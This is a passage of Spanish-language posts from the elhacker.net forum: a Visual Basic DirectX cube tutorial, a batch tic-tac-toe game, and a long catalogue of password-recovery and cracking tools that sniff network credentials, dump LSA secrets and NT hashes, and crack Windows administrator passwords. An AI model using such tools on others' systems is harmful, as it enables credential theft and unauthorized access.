elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: ¿Eres nuevo? ¿Tienes dudas acerca del funcionamiento de la comunidad? Lee las Reglas Generales


  Mostrar Temas
Páginas: 1 ... 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 [42]
411  Programación / Programación Visual Basic / Directx 3D en Visual Basic en: 12 Mayo 2007, 10:54 am
Bueno... encontré un tuto muy bueno que quiero compartir con ustedes
http://rapidshare.com/files/30851743/Dise_o_3D.rar
Explica como manejar el directx con VB para juegos o lo que sea.. estan bien chulos... aya va una sola parte de 10 en total:

Dim Anglex As Single
Dim Angley As Single
Dim Anglez As Single


Dim Dx As DirectX8
Dim D3D As Direct3D8
Dim D3DDevice As Direct3DDevice8
Dim Dx8 As New D3DX8
Dim BanderaDeSalida As Boolean

Const FVF_LVERTEX = (D3DFVF_XYZ Or D3DFVF_TEX1)

Private Type LITVERTEX
    X As Single
    Y As Single
    Z As Single
    tU As Single
    tV As Single
End Type

Dim CubeVerts(0 To 35) As LITVERTEX ' para nuestro cubo

Dim vbCube As Direct3DVertexBuffer8 ' el buffer de vertices para nuestro cubo

Dim matProj As D3DMATRIX ' matrices que nos ayudaran en los calculos
Dim matView As D3DMATRIX
Dim matWorld As D3DMATRIX

Dim textura As Direct3DTexture8

Const PI = 3.14159
Const RAD = PI / 180
Const DEG = 180 / PI

' InicializarDX
Public Function InicializarDX(hwnd As Long) As Boolean
    On Error GoTo ErrHandler:

    Dim DispMode As D3DDISPLAYMODE ' describe nuestro modo de visualizacion
    Dim tmpDispMode As D3DDISPLAYMODE ' variable temporal
    Dim D3DWindow As D3DPRESENT_PARAMETERS ' describe nuestro Viewport
    Dim I As Long ' para el ciclo de recorrido en los modos
   
    Set Dx = New DirectX8
    Set D3D = Dx.Direct3DCreate() ' creamos una interface 3D
   
    '#######################
    '##  PANTALLA COMPLETA #
    '#######################
    For I = 0 To D3D.GetAdapterModeCount(0) - 1 ' lista los modos del adaptador primario en l debugger
        D3D.EnumAdapterModes 0, I, tmpDispMode
        Debug.Print tmpDispMode.Width & " x " & tmpDispMode.Height & " x " & tmpDispMode.Format
    Next I
   
    DispMode.Format = CheckDisplayMode(640, 480, 32)
    Debug.Print "CHECKDISP(640,480,32) = ", DispMode.Format, D3DFMT_UNKNOWN
    If DispMode.Format > D3DFMT_UNKNOWN Then
        '640x480x32 si se soporta
        Debug.Print "USANDO Modo 640x480x32"
        DispMode.Width = 640: DispMode.Height = 480
    Else
        DispMode.Format = CheckDisplayMode(640, 480, 16)
        If DispMode.Format > D3DFMT_UNKNOWN Then
            '640x480x16 si se soporta
            Debug.Print "USANDO modo 640x480x16"
            DispMode.Width = 640: DispMode.Height = 480
        Else
            ' hmm... tienes una tarjeta de video extraña
            MsgBox "Tu hardware no parece soportar el modo de video:" _
                        & " 640x480 pixels con 16 bit o 32 bit de color. Terminando..." _
                        , vbInformation, "Error"
            Unload Me
            End
           
        End If
    End If
   
    D3DWindow.BackBufferCount = 1
    D3DWindow.Windowed = False
    D3DWindow.BackBufferFormat = DispMode.Format
    D3DWindow.BackBufferWidth = DispMode.Width
    D3DWindow.BackBufferHeight = DispMode.Height
    D3DWindow.hDeviceWindow = hwnd ' aqui va nuestra ventana
    D3DWindow.AutoDepthStencilFormat = D3DFMT_D16
    D3DWindow.EnableAutoDepthStencil = True
    D3DWindow.SwapEffect = D3DSWAPEFFECT_COPY_VSYNC
   
    ' aqui creamos nuestro dispositivo 3D
    Set D3DDevice = D3D.CreateDevice(D3DADAPTER_DEFAULT, D3DDEVTYPE_HAL, _
                                                        hwnd, _
                                                        D3DCREATE_SOFTWARE_VERTEXPROCESSING, _
                                                            D3DWindow)
    InicializarDX = True ' exito
    Exit Function
   
ErrHandler:
    Debug.Print "Codigo de error: " & Err.Number, Err.Description
    InicializarDX = False
End Function

Public Sub Render()
    ' limpiamos el backbuffer y tambien el Z buffer
    D3DDevice.Clear 0, ByVal 0, D3DCLEAR_TARGET Or D3DCLEAR_ZBUFFER, D3DColorRGBA(30, 30, 30, 255), 1#, 0

    D3DDevice.BeginScene

    ' aqui especificamos como se renderizan las texturas,
    ' en este caso para la stage 0 que es la que estamos
    ' utilizando. escogemos la textura a utilizar:
    D3DDevice.SetTexture 0, textura
    ' indicamos que el color se toma desde el argumento 1
    D3DDevice.SetTextureStageState 0, D3DTSS_COLOROP, D3DTOP_SELECTARG1
    ' indicamos que el argumento 1 es la textura
    D3DDevice.SetTextureStageState 0, D3DTSS_COLORARG1, D3DTA_TEXTURE
   
    D3DDevice.SetVertexShader FVF_LVERTEX

        '## METODO DE RENDERIZACION 2 ##
        '## este metodo usa el buffer de vertices sin indices
    D3DDevice.SetStreamSource 0, vbCube, Len(CubeVerts(0))
    D3DDevice.DrawPrimitive D3DPT_TRIANGLELIST, 0, 12
   
    D3DDevice.EndScene

    ' Presentamos los resultados(flip)
    D3DDevice.Present ByVal 0, ByVal 0, 0, ByVal 0
End Sub

Private Sub InicializaEscena()
    ' configuramos nuestro dispositivo
    D3DDevice.SetVertexShader FVF_LVERTEX ' indicamos que tipo de vertice estamos usando
    D3DDevice.SetRenderState D3DRS_LIGHTING, False  ' deshabilitamos iluminacion
    D3DDevice.SetRenderState D3DRS_ZENABLE, True ' habilitamos el Z-buffer
    D3DDevice.SetRenderState D3DRS_CULLMODE, D3DCULL_NONE ' especificamos NO ocultamiento
   
    ' las siguientes dos lineas especifican que filtro
    ' se utilizan para el manejo de texturas, el especificado
    ' D3DTEXF_LINEAR da un mejor aspecto, pero disminuye
    ' el perfomance, puedes utilizar D3DTEXF_POINT que tiene
    ' menos calidad pero es mas rapido
    D3DDevice.SetTextureStageState 0, D3DTSS_MAGFILTER, D3DTEXF_LINEAR
    D3DDevice.SetTextureStageState 0, D3DTSS_MINFILTER, D3DTEXF_LINEAR
   
    Set textura = Dx8.CreateTextureFromFile(D3DDevice, App.Path + "\textura.bmp")
    If textura Is Nothing Then Exit Sub
   
    'configuramos las matrices
   
    ' la World Matrix
    D3DXMatrixIdentity matWorld
    D3DDevice.SetTransform D3DTS_WORLD, matWorld 'commit this matrix to the device
   
    ' la matriz de vista
    D3DXMatrixLookAtLH matView, MakeVector(0, 5, 0), MakeVector(0, 0, 0), MakeVector(0, 0, 1)
    D3DDevice.SetTransform D3DTS_VIEW, matView
   
    ' matriz de proyeccion
    D3DXMatrixPerspectiveFovLH matProj, PI / 3, 1, 0.1, 75
    D3DDevice.SetTransform D3DTS_PROJECTION, matProj

    ' definimos los vertices del cubo
    'top
        CubeVerts(0) = CreateLitVertex(-1, 1, -1, 0, 1#)
        CubeVerts(1) = CreateLitVertex(1, 1, -1, 1#, 1#)
        CubeVerts(2) = CreateLitVertex(-1, 1, 1, 0, 0)
       
        CubeVerts(3) = CreateLitVertex(1, 1, -1, 1#, 1#)
        CubeVerts(4) = CreateLitVertex(1, 1, 1, 1#, 0)
        CubeVerts(5) = CreateLitVertex(-1, 1, 1, 0, 0)
       
    'bottom
        CubeVerts(6) = CreateLitVertex(-1, -1, -1, 0, 1#)
        CubeVerts(7) = CreateLitVertex(1, -1, -1, 1#, 1#)
        CubeVerts(8) = CreateLitVertex(-1, -1, 1, 0, 0)
       
        CubeVerts(9) = CreateLitVertex(1, -1, -1, 1#, 1#)
        CubeVerts(10) = CreateLitVertex(1, -1, 1, 1#, 0)
        CubeVerts(11) = CreateLitVertex(-1, -1, 1, 0, 0)
   
    'left
        CubeVerts(12) = CreateLitVertex(-1, 1, -1, 1, 0)
        CubeVerts(13) = CreateLitVertex(-1, 1, 1, 0, 0)
        CubeVerts(14) = CreateLitVertex(-1, -1, -1, 1, 1)
       
        CubeVerts(15) = CreateLitVertex(-1, 1, 1, 0, 0)
        CubeVerts(16) = CreateLitVertex(-1, -1, 1, 0, 1)
        CubeVerts(17) = CreateLitVertex(-1, -1, -1, 1, 1)
   
    'right
        CubeVerts(18) = CreateLitVertex(1, 1, -1, 1, 0)
        CubeVerts(19) = CreateLitVertex(1, 1, 1, 0, 0)
        CubeVerts(20) = CreateLitVertex(1, -1, -1, 1, 1)
       
        CubeVerts(21) = CreateLitVertex(1, 1, 1, 0, 0)
        CubeVerts(22) = CreateLitVertex(1, -1, 1, 0, 1)
        CubeVerts(23) = CreateLitVertex(1, -1, -1, 1, 1)
   
    'front
        CubeVerts(24) = CreateLitVertex(-1, 1, 1, 0, 0)
        CubeVerts(25) = CreateLitVertex(1, 1, 1, 1, 0)
        CubeVerts(26) = CreateLitVertex(-1, -1, 1, 0, 1)
       
        CubeVerts(27) = CreateLitVertex(1, 1, 1, 1, 0)
        CubeVerts(28) = CreateLitVertex(1, -1, 1, 1, 1)
        CubeVerts(29) = CreateLitVertex(-1, -1, 1, 0, 1)
   
    'back
        CubeVerts(30) = CreateLitVertex(-1, 1, -1, 0, 0)
        CubeVerts(31) = CreateLitVertex(1, 1, -1, 1, 0)
        CubeVerts(32) = CreateLitVertex(-1, -1, -1, 0, 1)
       
        CubeVerts(33) = CreateLitVertex(1, 1, -1, 1, 0)
        CubeVerts(34) = CreateLitVertex(1, -1, -1, 1, 1)
        CubeVerts(35) = CreateLitVertex(-1, -1, -1, 0, 1)
       
' creamos el buffer de vertices del cubo
    Set vbCube = D3DDevice.CreateVertexBuffer(Len(CubeVerts(0)) * 36, D3DUSAGE_WRITEONLY, FVF_LVERTEX, D3DPOOL_MANAGED)
    If vbCube Is Nothing Then Debug.Print "ERROR: no se pudo crear el buffer de vertices": Exit Sub
   
    D3DVertexBuffer8SetData vbCube, 0, Len(CubeVerts(0)) * 36, 0, CubeVerts(0)
   
End Sub

Private Function CreateLitVertex(X As Single, Y As Single, Z As Single, tU As Single, tV As Single) As LITVERTEX
    CreateLitVertex.X = X
    CreateLitVertex.Y = Y
    CreateLitVertex.Z = Z
    CreateLitVertex.tU = tU
    CreateLitVertex.tV = tV
End Function

Private Function MakeVector(X As Single, Y As Single, Z As Single) As D3DVECTOR
    MakeVector.X = X: MakeVector.Y = Y: MakeVector.Z = Z
End Function

Private Function CheckDisplayMode(Width As Long, Height As Long, Depth As Long) As CONST_D3DFORMAT
    Dim I As Long
    Dim DispMode As D3DDISPLAYMODE
   
    For I = 0 To D3D.GetAdapterModeCount(0) - 1
        D3D.EnumAdapterModes 0, I, DispMode
        If DispMode.Width = Width Then
            If DispMode.Height = Height Then
                If DispMode.Format = D3DFMT_R5G6B5 Or D3DFMT_X1R5G5B5 Or D3DFMT_X4R4G4B4 Then
                    '16 bit mode
                        If Depth = 16 Then
                            CheckDisplayMode = DispMode.Format
                            Exit Function
                        End If
                ElseIf DispMode.Format = D3DFMT_R8G8B8 Or D3DFMT_X8R8G8B8 Then
                    '32bit mode
                        If Depth = 32 Then
                            CheckDisplayMode = DispMode.Format
                            Exit Function
                        End If
                End If
            End If
        End If
    Next I
CheckDisplayMode = D3DFMT_UNKNOWN
End Function


Private Sub Form_Click()
BanderaDeSalida = False
End Sub


Private Sub Form_Load()
Dim matTemp As D3DMATRIX

Me.Show 'nos aseguramos que nuestra ventana es visible

BanderaDeSalida = InicializarDX(FrmMain.hwnd)

InicializaEscena

Anglex = 0
Angley = 0
Anglez = 0

Do While BanderaDeSalida
    D3DXMatrixIdentity matWorld
   
    D3DXMatrixIdentity matTemp
    D3DXMatrixRotationX matTemp, Anglex * RAD
    D3DXMatrixMultiply matWorld, matWorld, matTemp
   
    D3DXMatrixIdentity matTemp
    D3DXMatrixRotationY matTemp, Angley * RAD
    D3DXMatrixMultiply matWorld, matWorld, matTemp
   
    D3DXMatrixIdentity matTemp
    D3DXMatrixRotationZ matTemp, Anglez * RAD
    D3DXMatrixMultiply matWorld, matWorld, matTemp
   
    D3DDevice.SetTransform D3DTS_WORLD, matWorld
   
    Render ' realizamos un nuevo frame
    DoEvents ' tiempo para que Windows "Piense"

Loop 'proximo frame

' borramos y destruimos los objetos creaos
On Error Resume Next
Set textura = Nothing
'Set dx8 = Nothing
Set D3DDevice = Nothing
Set D3D = Nothing
Set Dx = Nothing

' fin
Unload Me
End
End Sub

Private Sub Form_MouseMove(Button As Integer, Shift As Integer, X As Single, Y As Single)
Anglex = Y / 2
Anglez = -X / 2
End Sub


Bueno... con esto hacemos un cubo con textura metalica que gura junto con el mouse en pantalla completa usando el directx.

Fuente: http://www.geocities.com/oswaldovarela/inicial.htm
PD: tratar con mucho cuidado esta web porque geocities cierra el host cuando la visitan mucho por unas horas.

Creo que con esto ya pueden empezar a crear sus propios juegos en 3D  ;D






412  Seguridad Informática / Hacking / Necesitas una contraseña? en: 7 Mayo 2007, 02:30 am
Todos los softwares mostrados en esta pagina son totalmente legales y de uso personal únicamente.


RAR GPU Password Recovery
Recupera passwords de ficheros con contraseña generados con WinRar:



Aprovecha potencia de la GPU (tanto para AMD como para Nvidia)

  • AES (WinRAR 3.x)



MessenPass v1.42
Recupera passwords perdidos de los siguientes mensajeros instantaneos:

  • MSN Messenger
  • Windows Messenger (In Windows XP)
  • Windows Live Messenger (In Windows XP And Vista)
  • Yahoo Messenger (Versions 5.x, 6.x, 7.x y 8.x)
  • Google Talk
  • ICQ Lite 4.x/5.x/2003
  • AOL Instant Messenger (only older versions, the password in newer versions of AIM cannot be recovered)
  • AOL Instant Messenger/Netscape 7
  • Trillian
  • Miranda
  • GAIM  


Mail PassView v1.38
Recupera las contraseñas perdidas de correos tales como:

  • Outlook Express
  • Microsoft Outlook 2000 (POP3 and SMTP Accounts only)
  • Microsoft Outlook 2002/2003/2007 (POP3, IMAP, HTTP and SMTP Accounts)
  • Windows Mail
  • IncrediMail
  • Eudora
  • Netscape 6.x/7.x
  • Mozilla Thunderbird
  • Group Mail Free
  • Yahoo! Mail - If the password is saved in Yahoo! Messenger application.
  • Hotmail/MSN mail - If the password is saved in MSN Messenger application.
  • Gmail - If the password is saved by Gmail Notifier application, Google Desktop, or by Google Talk.



Protected Storage PassView v1.63
revela las contraseñas almacenadas en tu computadora por:

  • Outlook
  • AutoComplete passwords in Internet Explorer
  • Password-protected sites in Internet Explorer
  • MSN Explorer Passwords


Dialupass v2.43
Recupera el nombre de usuario mas la contraseña de las conexiones atraves de la linea telefonica tales como las conexiones de:

  • Terra 64Kb
  • Telefonica speedy 2 Mb
  • Telefonica speedy 1 Mb
  • Telefonica speedy 128Kb
  • Telmex 1 Mb
  • Etc etc etc...
  • Tipo Dialup/RAS/VPN


Asterisk Logger v1.02
Revela las contraseñas detrás de los asteriscos (***)


SniffPass v1.01
utilidad que escucha tu red, captura las contraseñas que pasan a través de tu adaptador de la red, y las exhibe en la pantalla inmediatamente. SniffPass puede capturar las contraseñas de los protocolos siguientes (Puedes utilizar esta utilidad para recuperar contraseñas perdidas de Web/FTP/Email (contraseñas básicas de la autentificación)):

  • POP3
  • IMAP4
  • smtp
  • ftp
  • HTTP


Network Password Recovery v1.10
Cuando conectas con una parte de la red en tu LAN o con tu cuenta de Passport .NET, Windows permite que ahorres tu contraseña para utilizarla adentro cada vez que conectas el servidor alejado. Esta utilidad recupera todas las contraseñas de la red almacenadas en tu sistema para usuarios ya logueados. contraseñas que esta utilidad puede recuperar:

  • Login passwords of remote computers on your LAN.
  • Passwords of mail accounts on exchange server (stored by Outlook 2003)
  • Password of MSN Messenger / Windows Messenger accounts
  • Internet Explorer 7: passwords of password-protected Web sites ("Basic Authentication" or "Digest Access Authentication")
  • The item name of IE7 passwords always begin with "Microsoft_WinInet" prefix.


ProduKey v1.06
Recupera los seriales perdidos de los siguientes productos instalados (CD-Key):

  • MS-Office
  • Microsoft Windows
  • Exchange Server
  • SQL Server



WirelessKeyView v1.10
Recupera todas las contraseñas de la (WEP/WPA) almacenadas en tu computadora por el servicio "Wireless Zero Configuration" y "WLAN AutoConfig" de Windows Vista.


IE PassView v1.04
Recupera las contraseñas guardadas por:

  • Internet Explorer 4.0
  • Internet Explorer 6.0
  • Internet Explorer 7.0


LSASecretsView v1.10
Recupera las contraseñas guardadas en HKEY_LOCAL_MACHINE\Security\Policy\Secrets. Probado en Windows XP y Windows Vista 32 y 64 bits (entre otras cosas te revela la contraseña de usuario por defecto con el que inicias seción).


PasswordNow
Recupera las contraseñas de documentos protegidos como:

  • Microsoft Word
  • Microsoft Excel
  • Microsoft Outlook
  • Microsoft MS Access


Password Recovery Tools
Recupera las contraseñas de:

  • Access
  • Act!
  • Excel
  • Outlook
  • Word
  • Backup
  • MS Money
  • Lotus Organizer
  • MS Project
  • Schedule+
  • VBA modules (any applications)
  • Power Point
  • PDF
  • Quicken
  • QuickBooks
  • OneNote
  • zip/WinZip/pkzip
  • Rar/WinRar
  • WordPerfect


SQL Password
Recupera la contraseña de los siguientes tipos de Servidores SQL:

  • MS SQL Server 2000
  • MS SQL Server 2005
  • MS SQL Server 2005
  • MS SQL Server Express
  • MS SQL Server MSDE 2000 (Microsoft SQL Server Desktop Engine).



SHA-1 Password
Herramienta de la recuperación de la contraseña para los profesionales de la seguridad, que pueden ser utilizados para recuperar una contraseña si se sabe su hash SHA-1.


MD5 Password
Herramienta de la recuperación de la contraseña para los profesionales de la seguridad, que pueden ser utilizados para recuperar una contraseña si se sabe su hash MD5.


stPassword v1.00
Recupera la contraseña perdida del archivo de Outlook .PST (las carpetas personales). No tienes que instalar Ms-Outlook para utilizar esta utilidad. Necesitas solamente el archivo original de PST. Esta utilidad puede recuperar las contraseñas de PST:

  • Outlook 97
  • Outlook 2000
  • Outlook XP
  • Outlook 2003


AsterWin IE v1.03
Muestra las contraseñas ocultas tras los asteriscos de las paginas webs. Funciona desde Internet Explorer 5 en adelante. Codigo fuente en Visual Basic para su ejecución y estudio.


Remote Desktop PassView v1.00
Recupera la contraseña guardada por "Microsoft Remote Desktop" utilizada para la administración remota


PCAnywhere PassView v1.11
Recupera la contraseña guardada por pcANYWHERE en los siguientes tipos de archivos:

  • Caller Files  .cif  
  • Remote Control Files  .chf
  • Be A Host Files  .bhf  
  • Gateway Files  .gwf  
  • Online Service Files  .osf  


Access PassView 1.12
Recupera la contraseña que protege archivos .mdb creados por:

  • Microsoft Access 95
  • Microsoft Access 97
  • Microsoft Access 2000
  • Microsoft Access XP
  • Jet Database Engine 3.0
  • Jet Database Engine 4.0


Win9x PassView v1.1
Programa que revela los passwords guardados en Windows 95 y 98 tales como:

  • The user name and the password of the current logged-on user.
  • The cached passwords of the current logged-on user.
  • The passwords of your network shares (Only with share-level access control).
  • The password of the screen saber.



Enterprise Manager PassView v1.00
Recupera la contraseña de servidores SQL:

  • SQL Server 7.0
  • SQL Server 2000


AspNetUserPass v1.00
Revela la contraseña del usuario "AspNet"


Netscapass v2.03
Recupera contraseñas guardadas por Netscape tales como la contraseña de servidores POP3. Versiones soportadas:

  • Netscape Communicator 4.x
  • Netscape 6.x
  • Netscape 7.x


iOpus Password Recovery XP
Recupera las contraseñas guardadas en Windows XP


Advanced RAR Password Recovery
Recupera tus contraseñas de archivos *.rar


Advanced PDF Password Recovery
Los decrypts protegieron archivos del pdf del acróbata del adobe.


Advanced Office XP Password Recovery Pro
Recupera la contraseña que protege a tus documentos creados en Microsoft Office XP


Advanced PDF Password Recovery Pro
Otro programa para recuperar la contraseña que protege a tu documento PDF.


Passware Password Recovery Kit
Pack muy completo para recuperar infinidad de contraseñas desde mensajeros hasta documentos word, pdf, etc etc


Post Nº52485
Recupera tu contraseña de cualquier correo Hotmail y mensajeros MSN


Advanced ZIP Password Recovery
Recuperación de contraseñas perdidas del CIERRE RELÁMPAGO.

  • PKZip
  • WinZip


FileMaker Password Recovery
Recupera las contraseñas perdidas u olvidadas para las bases de datos de FileMaker.


Google Talk Password Recovery
Recupera tus contraseñas de Google Talk.


WinHKI
Programa que funciona como compresor y descompresor, ademas de funcionar como Crackeador y desenriptador para archivos:

  • HKI1
  • HKI2
  • HKI3
  • BH
  • CAB
  • GZip
  • LHA
  • JAR
  • TAR
  • ZIP
  • BZ2
  • RAR
  • ACE


BIOS Password Remover
Recupera tu bios AWARD removiendo la contraseña. Solo para Windows Win9x/ME.
Por sistemas de seguridad en la web del autor... solo es posible bajar el programa copiando el link y pegandolo en el explorador.
http://www.infogreg.com/crapware/junkcode/files/bios_pass_remover.zip


Cain & Abel
Cain y Abel es una herramienta de la recuperación de la contraseña para los sistemas operativos de Microsoft. Permite la recuperación fácil de la varia clase de contraseñas sniffeando la red, crackeando contraseñas cifradas usando los ataques del diccionario, de la fuerza bruta y del criptoanálisis, conversaciones de registración de VoIP, contraseñas revueltas el descifrar, recuperando las llaves sin hilos de la red, cajas de la contraseña que revelan, destapando contraseñas depositadas y analizando protocolos de la encaminamiento. El programa no explota ningunas vulnerabilidades o bugs del software que no se podrían fijar con poco esfuerzo.

  • Remote Console
  • Remote LSA Secrets Dumper
  • Remote NT Hashes Dumper
  • Remote Route Table Manager
  • Remote TCP/UDP Table Viewer
  • Cisco Config Downloader/Uploader
  • MAC Scanner
  • Network Enumerator
  • Password Crackers
  • Brute-Force Password Cracker
  • Dictionary Password Cracker
  • Cryptanalysis
  • Rainbowcrack-online
  • WEP Cracker
  • Password Decoders
  • Password Dumpers
  • Password/Hash Calculators
  • Promiscuous-mode Scanner
  • Route Table Manager
  • Service Manager
  • SID Scanner
  • Sniffer
  • TCP/UDP Table Viewer
  • Traceroute
  • Wireless Scanner


Recupera la contraseña del administrador de Windows.



Contraseñas por defecto en las BIOS ROUTERS y WPA de FON



Claves WEP de wifis de R (la compañía de cable de Galicia)



Ophcrack
Aplicación que permite obtener las contraseñas de tu sistema Windows basado en el Ophcrack 1.0, disponible tanto para Windows como para Linux graciasa  las libretrías GTK.
En otras palabras Ophcrack es un Crackeador de Passwords en Windows basada en time-memory trade-off usando  raibon tables, una nueva variante de la compensación original de Hellman, recupera 99.9% de contraseñas alfanuméricas en segundos.
Entre otras cosas es capaz de crackear la contraseña del administrador en Windows Vista.


Sam Inside
El programa de SAMInside se señala para recuperar las contraseñas de los usuarios de Windows NT /2000/XP/2003 y tiene algunas características excepcionales: El programa tiene tamaño pequeño, no requiere la instalación y se puede funcionar del diskette, CD/DVD-disk o USB-conduce. Incluye sobre 10 tipos de importación de los datos y 6 tipos de ataque de las contraseñas:

  • Brute-force attack
  • Distributed attack
  • Mask attack
  • Dictionary attack
  • Hybrid attack
  • Pre-calculated tables attack

Forzando código del programa se escribe totalmente en el ensamblador qué deja para conseguir extremadamente la velocidad de la contraseña que fuerza procedimiento en cualquier procesador. El programa extrae correctamente los nombres y las contraseñas de los usuarios de Windows NT /2000/XP/2003 en la codificación del símbolo nacional. ¡El programa es la primera utilidad en el mundo que comenzó a trabajar con las contraseñas cifradas por la llave SYSKEY del sistema!
+Info: http://www.insidepro.com/eng/saminside.shtml


Continuará...
413  Programación / Scripting / Juego del gato creado en batch (modo grafico) en: 1 Abril 2007, 00:27 am
Me interesó tanto el tema de la programación en batch que busqué entre mis cosas antiguas este viejo script para que se diviertan jugando al gato en modo grafico ;) =

Código:
@ECHO OFF
REM " AQUI MIRA SI SE ESTA INICIANDO EL JUEGO Y SI ES ASI BORRA
REM TODA HUELLA DE ALGUNA POSIBLE SALIDA INCORRECTA DEL JUEGO ".
@IF A == %1 GOTO BEGIN
@IF X == %1 GOTO BEGIN
@IF O == %1 GOTO BEGIN
IF EXIST *.T DEL *.T
:BEGIN
REM " EN ESTA PARTE MIRA Y ACTUALIZA LA CANTIDAD DE JUGADAS YA REALIZADAS "
IF NOT EXIST *.T CLS
IF EXIST 9.T REN 9.T 10.T
IF EXIST 10.T GOTO INICIO
IF EXIST 8.T REN 8.T 9.T
IF EXIST 9.T GOTO INI
IF EXIST 7.T REN 7.T 8.T
IF EXIST 8.T GOTO INI
IF EXIST 6.T REN 6.T 7.T
IF EXIST 7.T GOTO INI
IF EXIST 5.T REN 5.T 6.T
IF EXIST 6.T GOTO INI
IF EXIST 4.T REN 4.T 5.T
IF EXIST 5.T GOTO INI
IF EXIST 3.T REN 3.T 4.T
IF EXIST 4.T GOTO INI
IF EXIST 2.T REN 2.T 3.T
IF EXIST 3.T GOTO INI
IF EXIST 1.T REN 1.T 2.T
IF EXIST 2.T GOTO INI
IF EXIST 0.T REN 0.T 1.T
IF EXIST 1.T GOTO INI
REM " ESTA ES LA PORTADA DE BIENVENIDA "
IF NOT EXIST 0.T ECHO.
IF NOT EXIST 0.T ECHO.
IF NOT EXIST 0.T ECHO.
IF NOT EXIST 0.T ECHO.
IF NOT EXIST 0.T ECHO.
IF NOT EXIST 0.T ECHO.
IF NOT EXIST 0.T ECHO                        BIENVENIDO A: " BATCHRUN TRIQUI "
IF NOT EXIST 0.T ECHO.
IF NOT EXIST 0.T ECHO.
IF NOT EXIST 0.T ECHO.
IF NOT EXIST 0.T ECHO                            DISE¥ADO POR: BLACKWOLF
IF NOT EXIST 0.T ECHO.
IF NOT EXIST 0.T ECHO.
IF NOT EXIST 0.T ECHO.
IF NOT EXIST 0.T ECHO                         TODOS LOS DERECHOS RESERVADOS
IF NOT EXIST 0.T ECHO.
IF NOT EXIST 0.T ECHO                             COLOMBIA COFFEE HACKERS
IF NOT EXIST 0.T PAUSE > NUL
IF NOT EXIST 0.T ECHO TRIQUI > 0.T
REM "AQUI SE CREA UN SUBPROGRAMITA QUE USARA EL JUEGO PARA PODER LEER
REM LAS OPCIONES QUE TECLEE EL JUGADOR, SIEMPRE Y CUANDO NO EXISTA "
IF EXIST CODTECLA.COM GOTO NDEBUG
:DEBUG
ECHO N CODTECLA.COM >> CT.SCR
ECHO A 100 >> CT.SCR
ECHO INT 16 >> CT.SCR
ECHO MOV AL, AH >> CT.SCR
ECHO MOV AH, 4C  >> CT.SCR
ECHO INT 21  >> CT.SCR
ECHO.  >> CT.SCR
ECHO R CX  >> CT.SCR
ECHO 8  >> CT.SCR
ECHO W  >> CT.SCR
ECHO Q  >> CT.SCR
DEBUG < CT.SCR > NUL
DEL CT.SCR
:NDEBUG
REM " AQUI SE INICIA Y ASIGNAN LOS PRIMEROS VALORES A LA MATRIZ DEL JUEGO "
%0 A B C D E F G H I
REM " EN ESTA PARTE MIRA CON QUE SIGNO (X,O) HACER LA JUGADA "
:INI
IF NOT EXIST X.T GOTO INIA
IF EXIST X.T GOTO INIB
:INIA
ECHO TRIQUI > X.T
GOTO INICIO
:INIB
DEL X.T
GOTO INICIO
REM " AQUI SE MUESTRA EN PANTALLA LA MATRIZ CON LOS VALORES QUE SE TRAIGAN "
:INICIO
CLS
ECHO.
ECHO.
ECHO                  TECLEE LA LETRA EN DONDE QUIERE HACER SU JUGADA :
ECHO.
ECHO.
ECHO                                   ÉÍÍÍËÍÍÍËÍÍÍ»
ECHO                                   º %1 º %2 º %3 º
ECHO                                   ÌÍÍÍÎÍÍÍÎÍÍ͹
ECHO                                   º %4 º %5 º %6 º
ECHO                                   ÌÍÍÍÎÍÍÍÎÍÍ͹
ECHO                                   º %7 º %8 º %9 º
ECHO                                   ÈÍÍÍÊÍÍÍÊÍÍͼ
ECHO.
ECHO                             O PULSE " ESC " PARA SALIR.
ECHO.
REM " EN ESTA PARTE SE COMPARAN LOS VALORES DE LA MATRIZ DEL JUEGO
REM PARA SABER SI ALGUIEN GANO Y SE FELICITA A QUIEN LO HIZO"
IF %1 == %2 IF %2 == %3 ECHO 
IF %1 == %2 IF %2 == %3 ECHO                         ­ FELICITACIONES ACABAS DE GANAR !
IF %1 == %2 IF %2 == %3 PAUSE > NUL
IF %1 == %2 IF %2 == %3 GOTO FIN
IF %4 == %5 IF %5 == %6 ECHO 
IF %4 == %5 IF %5 == %6 ECHO                         ­ FELICITACIONES ACABAS DE GANAR !
IF %4 == %5 IF %5 == %6 PAUSE > NUL
IF %4 == %5 IF %5 == %6 GOTO FIN
IF %7 == %8 IF %8 == %9 ECHO 
IF %7 == %8 IF %8 == %9 ECHO                         ­ FELICITACIONES ACABAS DE GANAR !
IF %7 == %8 IF %8 == %9 PAUSE > NUL
IF %7 == %8 IF %8 == %9 GOTO FIN
IF %1 == %4 IF %4 == %7 ECHO 
IF %1 == %4 IF %4 == %7 ECHO                         ­ FELICITACIONES ACABAS DE GANAR !
IF %1 == %4 IF %4 == %7 PAUSE > NUL
IF %1 == %4 IF %4 == %7 GOTO FIN
IF %2 == %5 IF %5 == %8 ECHO 
IF %2 == %5 IF %5 == %8 ECHO                         ­ FELICITACIONES ACABAS DE GANAR !
IF %2 == %5 IF %5 == %8 PAUSE > NUL
IF %2 == %5 IF %5 == %8 GOTO FIN
IF %3 == %6 IF %6 == %9 ECHO 
IF %3 == %6 IF %6 == %9 ECHO                         ­ FELICITACIONES ACABAS DE GANAR !
IF %3 == %6 IF %6 == %9 PAUSE > NUL
IF %3 == %6 IF %6 == %9 GOTO FIN
IF %1 == %5 IF %5 == %9 ECHO 
IF %1 == %5 IF %5 == %9 ECHO                         ­ FELICITACIONES ACABAS DE GANAR !
IF %1 == %5 IF %5 == %9 PAUSE > NUL
IF %1 == %5 IF %5 == %9 GOTO FIN
IF %7 == %5 IF %5 == %3 ECHO 
IF %7 == %5 IF %5 == %3 ECHO                         ­ FELICITACIONES ACABAS DE GANAR !
IF %7 == %5 IF %5 == %3 PAUSE > NUL
IF %7 == %5 IF %5 == %3 GOTO FIN
REM " SI EXISTE 10.T SIGNIFICA QUE HIZO LA ULTIMA JUGADA Y SI SE LLEGO A ESTA
REM  PARTE, ES QUE NADIE GANO, POR LO QUE SE EJECUTA EL FINAL DEL JUEGO "
IF EXIST 10.T  ECHO                             NADIE GANO EN ESTA OCACION
IF EXIST 10.T PAUSE > NUL
IF EXIST 10.T GOTO FIN
:COD
REM " EN ESTA PARTE SE LEE LA OPCION QUE DESEA EL JUGADOR ELEGIR "
CODTECLA
REM " AQUI SE EJECUTA LA OPCION ELEGIDA POR EL JUGADOR "
